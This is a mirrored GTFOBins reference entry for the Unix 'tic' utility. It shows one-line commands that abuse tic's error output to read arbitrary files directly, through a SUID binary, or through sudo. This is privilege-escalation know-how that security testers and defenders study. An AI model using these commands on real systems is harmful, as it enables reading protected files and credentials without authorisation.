1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/tic.md
2021-08-18 14:10:58 +02:00

501 B

description functions
The tic command translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure, so this may not be suitable to read arbitrary binary data.
file-read suid sudo
code
LFILE=file_to_read tic -C "$LFILE"
code
LFILE=file_to_read ./tic -C "$LFILE"
code
LFILE=file_to_read sudo tic -C "$LFILE"